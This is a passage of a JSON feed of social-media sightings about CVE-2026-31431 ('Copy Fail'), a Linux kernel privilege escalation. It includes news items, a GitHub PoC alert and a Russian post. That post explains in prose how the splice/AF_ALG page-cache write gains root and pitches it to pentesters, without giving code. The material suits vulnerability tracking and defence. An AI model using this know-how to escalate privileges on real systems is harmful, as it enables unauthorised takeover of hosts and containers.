EPMM\u300d\u300cPAN-OS\u300d\u306f\u7dca\u6025\u5bfe\u5fdc\u3092\n\n\u7c73\u5f53\u5c40\u306f\u3001\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u305f3\u4ef6\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066\u6ce8\u610f\u3092\u547c\u3073\u304b\u3051\u3066\u3044\u308b\u3002\u7279\u306b2\u4ef6\u306b\u3064\u3044\u3066\u306f\u7dca\u6025\u6027\u304c\u9ad8\u304f\u3001\u7c73\u884c\u653f\u6a5f\u95a2\u3067\u306f\u767b\u9332\u304b\u30893\u65e5\u4ee5\u5185\u306b\u5bfe\u5fdc\u3059\u308b\u5fc5\u8981\u304c\u3042\u308b\u3002\n\n\u7c73\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5e81\uff08CISA\uff09\u306f\u3001\u73fe\u5730\u6642\u95932026\u5e745\u67081\u65e5\u304b\u30897\u65e5\u306b\u304b\u3051\u3066\u300c\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u305f\u8106\u5f31\u6027\u30ab\u30bf\u30ed\u30b0\uff08KEV\uff09\u300d\u3078\u8106\u5f31\u60273\u4ef6\u3092\u8ffd\u52a0\u3057\u305f\u3002\n\n\u300cLinux Kernel\u300d\u306b\u5224\u660e\u3057\u305f\u5225\u540d\u300cCopy Fail\u300d\u3068\u3082\u547c\u3070\u308c\u308b\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u300cCVE-2026-31431\u300d\u304c\u767b\u9332\u3055\u308c\u305f\u3002\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u306b\u3088...", "creation_timestamp": "2026-05-22T21:12:50.408795Z"}, {"uuid": "7818bc27-34a8-47f5-8516-7f750968bf26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmhtzyzr2k27", "content": "\u7c73\u5f53\u5c40\u3001\u8106\u5f31\u60273\u4ef6\u306e\u60aa\u7528\u3092\u8b66\u544a - \u300cIvanti EPMM\u300d\u300cPAN-OS\u300d\u306f\u7dca\u6025\u5bfe\u5fdc\u3092\n\n\u7c73\u5f53\u5c40\u306f\u3001\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u305f3\u4ef6\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066\u6ce8\u610f\u3092\u547c\u3073\u304b\u3051\u3066\u3044\u308b\u3002\u7279\u306b2\u4ef6\u306b\u3064\u3044\u3066\u306f\u7dca\u6025\u6027\u304c\u9ad8\u304f\u3001\u7c73\u884c\u653f\u6a5f\u95a2\u3067\u306f\u767b\u9332\u304b\u30893\u65e5\u4ee5\u5185\u306b\u5bfe\u5fdc\u3059\u308b\u5fc5\u8981\u304c\u3042\u308b\u3002\n\n\u7c73\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5e81\uff08CISA\uff09\u306f\u3001\u73fe\u5730\u6642\u95932026\u5e745\u67081\u65e5\u304b\u30897\u65e5\u306b\u304b\u3051\u3066\u300c\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u305f\u8106\u5f31\u6027\u30ab\u30bf\u30ed\u30b0\uff08KEV\uff09\u300d\u3078\u8106\u5f31\u60273\u4ef6\u3092\u8ffd\u52a0\u3057\u305f\u3002\n\n\u300cLinux Kernel\u300d\u306b\u5224\u660e\u3057\u305f\u5225\u540d\u300cCopy Fail\u300d\u3068\u3082\u547c\u3070\u308c\u308b\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u300cCVE-2026-31431\u300d\u304c\u767b\u9332\u3055\u308c\u305f\u3002\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u306b\u3088...", "creation_timestamp": "2026-05-22T21:13:28.546907Z"}, {"uuid": "20779b28-911d-4378-be01-d8536e61476c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/85440", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-python\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a wh1sky02\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-22 18:58:31\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPortable Python PoC for CVE-2026-31431 (Copy Fail)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-22T19:00:04.000000Z"}, {"uuid": "f86f0ea6-608d-4317-9b61-f180a45ea31c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newstecnicas.com/post/3mmiccdd72k27", "content": "\ud83d\udc27 \u00bfC\u00f3mo funciona ' #CopyFail'? El #exploit de 732 bytes que otorga acceso #Root en Linux (CVE-2026-31431) (+MITIGACI\u00d3N) www.newstecnicas.com/2026/04/copy...", "creation_timestamp": "2026-05-23T01:28:42.222115Z"}, {"uuid": "1446afbc-c284-4b1e-9563-a97140784076", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "exploited", "source": "https://t.me/codeby_sec/10141", "content": "732 \u0431\u0430\u0439\u0442\u0430 Python-\u043a\u043e\u0434\u0430 \u2014 \u0438 \u0434\u0435\u0442\u0435\u0440\u043c\u0438\u043d\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 root \u043d\u0430 \u043b\u044e\u0431\u043e\u043c Linux\n\n\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u044c\u0442\u0435: \u043e\u0434\u0438\u043d \u0441\u043a\u0440\u0438\u043f\u0442, \u043d\u0438\u043a\u0430\u043a\u0438\u0445 race condition, \u043d\u0438\u043a\u0430\u043a\u0438\u0445 per-distro offsets \u2014 \u0438 \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u0440\u0443 \u0441\u0435\u043a\u0443\u043d\u0434 \u0432\u0430\u0448 www-data \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432 root. \u0418\u043c\u0435\u043d\u043d\u043e \u0442\u0430\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 CVE-2026-31431, \u043e\u043d\u0430 \u0436\u0435 Copy Fail \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0440\u044f\u0442\u0430\u043b\u0430\u0441\u044c \u0432 \u044f\u0434\u0440\u0435 Linux \u0434\u0435\u0432\u044f\u0442\u044c \u043b\u0435\u0442.\n\n\ud83d\udd0e\u0421\u0443\u0442\u044c \u0431\u0430\u0433\u0430 \u2014 \u0432 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u0438 \u0442\u0440\u0451\u0445 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c \u044f\u0434\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e:\n\n\u2022 AF_ALG \u2014 \u0441\u043e\u043a\u0435\u0442\u043d\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 \u043a \u043a\u0440\u0438\u043f\u0442\u043e-API \u044f\u0434\u0440\u0430, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 \u043b\u044e\u0431\u043e\u043c\u0443 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0443\n\u2022 splice() \u2014 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u0432\u044b\u0437\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0447\u0435\u0440\u0435\u0437 \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b page cache \u0431\u0435\u0437 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f\n\u2022 Page cache \u2014 \u043e\u0431\u0449\u0435\u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u043a\u0435\u0448, \u0433\u0434\u0435 \u043e\u0434\u043d\u0430 \u0438 \u0442\u0430 \u0436\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f setuid-\u0431\u0438\u043d\u0430\u0440\u0438\n\n\u0412 2017 \u0433\u043e\u0434\u0443 \u043c\u043e\u0434\u0443\u043b\u044c algif_aead \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043e\u043f\u0442\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u044e: destination \u0438 reference pages \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u043b\u0438 \u0432 \u0435\u0434\u0438\u043d\u044b\u0439 scatterlist. \u041d\u043e \u043a\u043e\u0434 \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u043b, \u043c\u043e\u0436\u043d\u043e \u043b\u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b output-\u0440\u0435\u0433\u0438\u043e\u043d\u0430. \u0428\u0430\u0431\u043b\u043e\u043d authencesn \u043f\u0440\u0438 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0435 \u043f\u0438\u0448\u0435\u0442 4 \u0431\u0430\u0439\u0442\u0430 scratch-\u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u043e \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044e. \u0427\u0435\u0440\u0435\u0437 splice() \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043f\u043e\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b page cache \u043e\u0442 setuid-\u0431\u0438\u043d\u0430\u0440\u044f \u2014 \u0438 \u044d\u0442\u0438 \u0447\u0435\u0442\u044b\u0440\u0435 \u0431\u0430\u0439\u0442\u0430 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043f\u0440\u044f\u043c\u043e \u0432 \u043a\u0435\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043e\u0431\u0440\u0430\u0437 /usr/bin/su. \u041d\u0430 \u0434\u0438\u0441\u043a\u0435 \u0444\u0430\u0439\u043b \u043d\u0435 \u0442\u0440\u043e\u043d\u0443\u0442, \u0430 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u2014 \u0443\u0436\u0435 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d.\n\n\ud83d\udc49\u041f\u043e\u0447\u0435\u043c\u0443 \u044d\u0442\u043e \u0441\u0442\u0440\u0430\u0448\u043d\u0435\u0435 Dirty Pipe? \u0422\u0440\u0438 \u043f\u0440\u0438\u0447\u0438\u043d\u044b:\n\n1. \u0414\u0435\u0442\u0435\u0440\u043c\u0438\u043d\u0438\u0437\u043c \u2014 \u043d\u0435\u0442 \u043e\u043a\u043d\u0430 \u0433\u043e\u043d\u043a\u0438, \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u043e 100% \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c\u044e\n2. \u0423\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u2014 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u043a\u0430\u0436\u0434\u043e\u043c \u043a\u0440\u0443\u043f\u043d\u043e\u043c \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0435 \u0441 \u044f\u0434\u0440\u043e\u043c \u043e\u0442 2017 \u0433\u043e\u0434\u0430 (Ubuntu, RHEL, Amazon Linux, SUSE, Debian)\n3. Container escape \u2014 page cache \u043e\u0431\u0449\u0438\u0439 \u0434\u043b\u044f \u0445\u043e\u0441\u0442\u0430 \u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 \u0441 shared kernel, \u0442\u0430\u043a \u0447\u0442\u043e Copy Fail \u2014 \u044d\u0442\u043e \u0435\u0449\u0451 \u0438 \u043f\u043e\u0431\u0435\u0433 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430. PoC \u0434\u043b\u044f Kubernetes \u0443\u0436\u0435 \u0432\u0430\u043b\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d \u043d\u0430 EKS, GKE \u0438 Alibaba Cloud ACK.\n\n\ud83c\udf87\u0427\u0442\u043e \u0443\u0441\u0442\u043e\u044f\u043b\u043e? \u041c\u0438\u043a\u0440\u043e\u0412\u041c (AWS Firecracker, Fargate), gVisor, V8-\u0438\u0437\u043e\u043b\u044f\u0442\u044b Cloudflare Workers \u2014 \u0432\u0441\u0451, \u0433\u0434\u0435 \u0443 \u043a\u0430\u0436\u0434\u043e\u0433\u043e tenant \u0441\u0432\u043e\u0451 \u044f\u0434\u0440\u043e.\n\n\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442: \u0431\u0430\u0433 \u043f\u0440\u044f\u0442\u0430\u043b\u0441\u044f \u0442\u0430\u043a \u0434\u043e\u043b\u0433\u043e, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0443 crypto/ \u0440\u0435\u0432\u044c\u044e\u0438\u043b\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u044b. \u041e\u043d\u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u043b\u0438 IND-CPA, side channels, \u0432\u0430\u043b\u0438\u0434\u0430\u0446\u0438\u044e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432. \u0410 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0434\u043e\u043b\u0436\u043d\u0430 \u043b\u0438 \u044d\u0442\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432\u043e\u043e\u0431\u0449\u0435 \u0431\u044b\u0442\u044c writeable?\u00bb \u2014 \u0438\u0437 \u0434\u0440\u0443\u0433\u043e\u0439 \u0434\u0438\u0441\u0446\u0438\u043f\u043b\u0438\u043d\u044b, \u0438 \u043e\u043d \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u043f\u0430\u043b \u0438\u0437 \u043f\u043e\u043b\u044f \u0437\u0440\u0435\u043d\u0438\u044f. \u0414\u0435\u0432\u044f\u0442\u044c \u043b\u0435\u0442.\n\n\u041d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u0434\u043b\u044f \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440\u0430 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442: \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f low-priv shell \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 Copy Fail \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442 \u043c\u0435\u043d\u044c\u0448\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u0447\u0435\u043c \u043f\u0435\u0440\u0435\u0431\u043e\u0440 SUID-\u0431\u0438\u043d\u0430\u0440\u0435\u0439 \u0438\u043b\u0438 \u0440\u0430\u0437\u0431\u043e\u0440 cron jobs. \u0415\u0441\u043b\u0438 \u043c\u043e\u0434\u0443\u043b\u044c algif_aead \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0438 \u044f\u0434\u0440\u043e \u043d\u0435 \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043e \u2014 root \u0437\u0430 \u0441\u0435\u043a\u0443\u043d\u0434\u044b.\n\n\u041f\u043e\u043b\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043c\u0435\u0445\u0430\u043d\u0438\u043a\u0438, \u043f\u043e\u0448\u0430\u0433\u043e\u0432\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435 \u0447\u0438\u0442\u0430\u0439\u0442\u0435 \u0432 \u043f\u043e\u043b\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435.\n\nhttps://codeby.net/threads/cve-2026-31431-copy-fail-razbor-linux-privilege-escalation-bez-race-condition.93766/", "creation_timestamp": "2026-05-24T10:04:04.000000Z"}]}